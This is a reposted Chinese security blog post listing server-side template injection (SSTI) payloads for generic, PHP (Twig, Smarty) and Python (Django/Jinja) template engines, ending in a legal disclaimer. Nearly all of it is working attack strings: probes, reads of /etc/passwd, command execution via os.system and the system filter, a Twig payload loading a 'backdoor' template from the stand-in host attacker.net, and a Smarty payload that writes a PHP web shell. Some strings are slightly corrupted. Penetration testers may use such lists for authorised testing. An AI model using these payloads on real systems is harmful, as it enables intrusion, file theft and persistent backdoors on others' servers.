文章总结: 文档整理了服务器端模板注入SSTI的常用测试Payload,覆盖通用、PHP及Python环境。包含检测语法如数学运算表达式和对象调试,以及读取文件或执行命令的攻击代码片段。该列表适合渗透测试人员快速参考以验证漏洞存在性并获取初步访问权限。 综合评分: 60 文章分类: 渗透测试,WEB安全,漏洞POC
SSTI常用payload
原创
01iver Sec
01iver的安全小圈
2026年1月13日 17:00 北京
通用
${{<%[%'”}}%.
{% debug %}
{7*7}
{{ ‘7’*7 }}
{2*2}[[7*7]]
<%= 7 \* 7 %>
{3*3}
{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{”.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{[‘cat%20/etc/passwd’]|filter(‘system’)}}
PHP
{php}print “Hello”{/php}
{php}$s = file_get_contents(‘/etc/passwd’,NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(‘,’)}}
“{{‘/etc/passwd’|file_excerpt(1,30)}}”@
{{_self.env.setCache(“ftp://attacker.net:2121”)}}{{_self.env.loadTemplate(“backdoor”)}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,”<?php passthru($_GET['cmd']); ?>“,self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system(‘whoami’)}}
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:01iver的安全小圈 01iver Sec《SSTI常用payload》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论